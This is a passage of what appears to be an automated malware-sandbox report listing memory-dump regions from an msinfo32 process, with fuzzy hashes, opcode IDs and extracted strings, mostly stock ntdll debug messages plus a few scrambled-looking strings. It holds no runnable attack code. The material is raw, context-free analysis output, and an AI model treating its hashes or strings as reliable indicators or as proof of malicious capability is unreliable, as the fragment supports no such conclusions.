                                                                                                        • Source File: 00000010.00000002.2658373965.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4d10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6be57a8013c1579caa6332c3dc5331dc40a82abbd5e1721d119ac87d74bdcd70
                                                                                                        • Instruction ID: 14918954e727ebad41e5a284e7fb8dac941a6e6726488065d5ee927cad562ee0
                                                                                                        • Opcode Fuzzy Hash: 6be57a8013c1579caa6332c3dc5331dc40a82abbd5e1721d119ac87d74bdcd70
                                                                                                        • Instruction Fuzzy Hash: 2441C87161CB0D5FE768EF68A081676B3E2FB99304F50052DDD87C3662EA70F8468685
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658373965.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4d10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                        • API String ID: 0-3558027158
                                                                                                        • Opcode ID: 63bc06787917148057ad45ffaeec727242f296b6c1b2dc91b4de05545207baeb
                                                                                                        • Instruction ID: 71eeb60ec4475794d7b69c09343a9e9904d64a36cb647251b19f0871d14d4159
                                                                                                        • Opcode Fuzzy Hash: 63bc06787917148057ad45ffaeec727242f296b6c1b2dc91b4de05545207baeb
                                                                                                        • Instruction Fuzzy Hash: 9FA15FF04482948AC7198F54B0652AFFFB1EBC6305F15816DE6E6BB243C3BE8905CB95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658373965.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4d10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %B`f$%Duu$%KQ%$%Vdc$*062$+400$+421$+63%$-NMQ$-Rlk$0+5%$062+$1+5+$3+4,$4+5+$4==<$63%J$7156$Fmwj$HI)%$UW*6$ajrv$dwl*$gNlq$h`*1$i`R`$iid*$iln`$nj,%
                                                                                                        • API String ID: 0-3932547586
                                                                                                        • Opcode ID: 761ddaed213d2a9041f88d77d7870c71bec3e8dcaf6e02233573fcd8ffb3dc5d
                                                                                                        • Instruction ID: 2ad03811eb22557cec0ed1ce79b438d1d7e1c61f317cfa4d7c80a6ea13d8ffdd
                                                                                                        • Opcode Fuzzy Hash: 761ddaed213d2a9041f88d77d7870c71bec3e8dcaf6e02233573fcd8ffb3dc5d
                                                                                                        • Instruction Fuzzy Hash: 403154B491834CDBCF18DF80E581ADEBB70FB14714F81A25DE9056E240CBB59A56CB8A
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: b357d5c267d28ddff5877a875956177a93e939d816cc543588d581ba96b12afc
                                                                                                        • Instruction ID: 1109fcf6d7eb2a6aa7acab426d9317652054b8fe001ad150059664022c738bb9
                                                                                                        • Opcode Fuzzy Hash: b357d5c267d28ddff5877a875956177a93e939d816cc543588d581ba96b12afc
                                                                                                        • Instruction Fuzzy Hash: 2651B7B5A00116BFDF11EF9888909BEF7B8BB48204754916DE5ADD7641E234FE508BE0
                                                                                                        Strings
                                                                                                        • ExecuteOptions, xrefs: 04EB46A0
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 04EB4787
                                                                                                        • Execute=1, xrefs: 04EB4713
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04EB4655
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04EB46FC
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04EB4742
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04EB4725
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EB02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 04EB031E
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EB02BD
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04EB7B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 04EB7BAC
                                                                                                        • RTL: Resource at %p, xrefs: 04EB7B8E
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EB728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04EB7294
                                                                                                        • RTL: Re-Waiting, xrefs: 04EB72C1
                                                                                                        • RTL: Resource at %p, xrefs: 04EB72A3
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        APIs
                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 04ECCFBD
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: CallFilterFunc@8
                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                        • API String ID: 4062629308-2383119779